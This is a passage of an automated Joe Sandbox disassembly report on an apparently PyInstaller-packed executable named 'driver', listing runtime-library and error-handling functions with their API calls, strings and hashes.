SetLastError.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3E7

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction ID: 4ff33f96e10842e483defba3b1a6c28c84005d5533e1d23eb5a295cf7448bdda
Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction Fuzzy Hash: 5B118E20F8F2428AFA58A723966123D61425F54FBCF444335E86EC6BC7DEACB441A301

Function 00007FF6A29B2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6A29B1B6A), ref: 00007FF6A29B295E

Strings

%s: %s, xrefs: 00007FF6A29B29E8
[PYI-%d:ERROR] , xrefs: 00007FF6A29B2966
Error [ANSI Fallback], xrefs: 00007FF6A29B29FF
Error, xrefs: 00007FF6A29B2A0E

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: 4c7b0c115121c1cbbd8fae8cf1599d275707e7a567bc843d9d4be60a5255390a
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: 8731F422B5A68156F7209B62A8502F76295BF88FDCF400132EE8DC375BEFBCD5469300

Function 00007FF6A29B2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6A29B23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF6A29B248E
DeleteObject.GDI32 ref: 00007FF6A29B24C1
DestroyIcon.USER32 ref: 00007FF6A29B24D3

Strings

Unhandled exception in script, xrefs: 00007FF6A29B23F8

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction ID: 7cd31d4b8acf0b514270a77b9ccc8e0a4560aed8dc0cec3c390876a684a75fec
Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction Fuzzy Hash: 00318432A4A68189EB24DF22E8552F963A0FF88B88F440135EA4D87B5BDF7CD100D700

Function 00007FF6A29B2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6A29B918F,?,00007FF6A29B3C55), ref: 00007FF6A29B2BA0
MessageBoxW.USER32 ref: 00007FF6A29B2C2A

Strings

WARNING, xrefs: 00007FF6A29B2BAF
Warning, xrefs: 00007FF6A29B2C1D
[PYI-%d:%ls] , xrefs: 00007FF6A29B2BA8

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: f3ac2ac17ec3c8bf984ab61d76ec7833834c9d58a30cd64f3de3ed90b4df0346
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: 2221A362B09B4186E7109B26F4547EA73A4FB88BC8F400136EE8D9765BDF7CD605D740

Function 00007FF6A29B2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6A29B1B99), ref: 00007FF6A29B2760

Strings

ERROR, xrefs: 00007FF6A29B276F
Error [ANSI Fallback], xrefs: 00007FF6A29B27CF
Error, xrefs: 00007FF6A29B27DE
[PYI-%d:%s] , xrefs: 00007FF6A29B2768

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: 52964d977038a293663dd9cfafa3e2ed55c28e7c3bf06825afa48c4db16e9e47
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: 9D21A172A5AB8182E620DB52F8817E66394FF88BC8F400136EE8C9375ADFBCD5459700

Function 00007FF6A29C9AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6A29C9B1D
GetProcAddress.KERNEL32 ref: 00007FF6A29C9B33
FreeLibrary.KERNEL32 ref: 00007FF6A29C9B5A

Strings

CorExitProcess, xrefs: 00007FF6A29C9B2C
mscoree.dll, xrefs: 00007FF6A29C9B14

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: d520a6f038c21e0ef555ee41f3a61349b9345e854baaa79cd777a563fd590117
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 41F0C231B4AB0681FB148B22E4643395360BF49F69F440239C66E861E5CFACE044F300

Function 00007FF6A29D93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6A29D9400
_set_statfp.LIBCMT ref: 00007FF6A29D941B
_set_statfp.LIBCMT ref: 00007FF6A29D9437
_set_statfp.LIBCMT ref: 00007FF6A29D9473

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 6d07d2a71f6d4b4cc8c80b1c1d7a0f55c5dafa228b64f865ff172a1211eeb096
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: EB119172EDEA2301F6543126D75637520C46F5DBBCF050634EA6E8A2D7EEECB9417104

Function 00007FF6A29CB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB41F
FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB43E
FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB466
FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB477
FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB488

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction ID: 1d7f2d9e553d8f47129fa4d761a6aaf4f07bbf8e62ae070a2063227739b019d3
Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction Fuzzy Hash: 7F118120F8F60249FA589723A5A127961425F64FBCF448335E87DC66D7DEBCF441A301

Function 00007FF6A29CB294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6A29CB2A5
FlsSetValue.KERNEL32 ref: 00007FF6A29CB2C4
FlsSetValue.KERNEL32 ref: 00007FF6A29CB2EC
FlsSetValue.KERNEL32 ref: 00007FF6A29CB2FD
FlsSetValue.KERNEL32 ref: 00007FF6A29CB30E

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction ID: 32ae4e378718d1dd155a0806f2024c251872120cf07e713f444891ed9415ca24
Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction Fuzzy Hash: 4C112A20E8B2074DF96CA62754612BE21425F56F7CF444734D93ECA6C7DDACB8417202

Function 00007FF6A29C6010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C6176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C622C

Strings

verbose, xrefs: 00007FF6A29C6020

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 6c0a7007b30ce88d8657dfd546cd2038640b9ffcd029eb39e61ab9fc3e2a1f47
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: F091CF32A4AA4689F7658E26D45077D37A1AB84F9CF444136DA8AC73CBDFBCF405A301

Function 00007FF6A29CFC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29CFF17

Part of subcall function 00007FF6A29C7AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C7AC9

Strings

UTF-16LEUNICODE, xrefs: 00007FF6A29CFEB5
ccs, xrefs: 00007FF6A29CFE52
UTF-8, xrefs: 00007FF6A29CFE96

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 6cae1eda240d8d74012f358bc9fd8d4ff0139abd9d968cc9023134093b84cc96
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 3381A172E8A2428EF7644E27C11027836A0AF11F8CF958036DA0DD769BDFADF941B741

Function 00007FF6A29BD6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6A29BD6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6A29BD77A
RtlUnwindEx.KERNEL32 ref: 00007FF6A29BD7D4

Strings

csm, xrefs: 00007FF6A29BD761

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: 715ec2aea275e2c7a29b8bfca51d503d3dfeb064d06ee3f2f22374a1d0862013
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: AC519F32B5A6028AEB149F16E444A787791FB44F9CF108134DA4E8BB8BDFBDE841D710

Function 00007FF6A29BF2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6A29BF320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6A29BF408

Strings

csm, xrefs: 00007FF6A29BF45A
csm, xrefs: 00007FF6A29BF342

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: ca0e5d33da3e64865ddb7080a57a05894876cbec074985cacd0516a99a3c4712
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: 7B517E3294928686EB748F26904437876A0FB55F98F144236EA9DC7B97CFBCE850E700

Function 00007FF6A29BEF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6A29BEFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6A29BEFF3

Strings

RCC, xrefs: 00007FF6A29BEFC3
MOC, xrefs: 00007FF6A29BEFBB

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: 3e645d1c7f53a3bc27edbec73665b6abc29c5937c1d24db6cad482e3f846c8a7
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 7B619372909BC585EB608B16E4403AAB7A0FB95F98F044635EB9D87B57DFBCD190CB00

Function 00007FF6A29B7E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF6A29B352C,?,00000000,00007FF6A29B3F23), ref: 00007FF6A29B7F22

Strings

\, xrefs: 00007FF6A29B7E87
%s%c, xrefs: 00007FF6A29B7E94
%.*s, xrefs: 00007FF6A29B7EDB

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction ID: 7e4cf7fcca1263ab1e9796fc657e1b1d4af76f9d141fe1bea4070a68a309b58f
Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction Fuzzy Hash: E131C42265AAC145EB219B22E8507EA6354EF84FE8F441331EE6D877CBDFACD6019700

Function 00007FF6A29B2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6A29B28EA

Strings

[PYI-%d:%ls] , xrefs: 00007FF6A29B2868
Error, xrefs: 00007FF6A29B28DD
ERROR, xrefs: 00007FF6A29B286F

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: 43608e3a7d71fbba694d0bce4705e405c754ceeee61d327d24f3a54586d0a28a
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 57219F62B09B4186E6109B66F4447EA63A4FB88B88F400136EE8D9365BDE7CE645D740

Function 00007FF6A29CC610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6A29CC68F
WriteFile.KERNEL32 ref: 00007FF6A29CC957
WriteFile.KERNEL32 ref: 00007FF6A29CC99D
GetLastError.KERNEL32 ref: 00007FF6A29CCA53

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
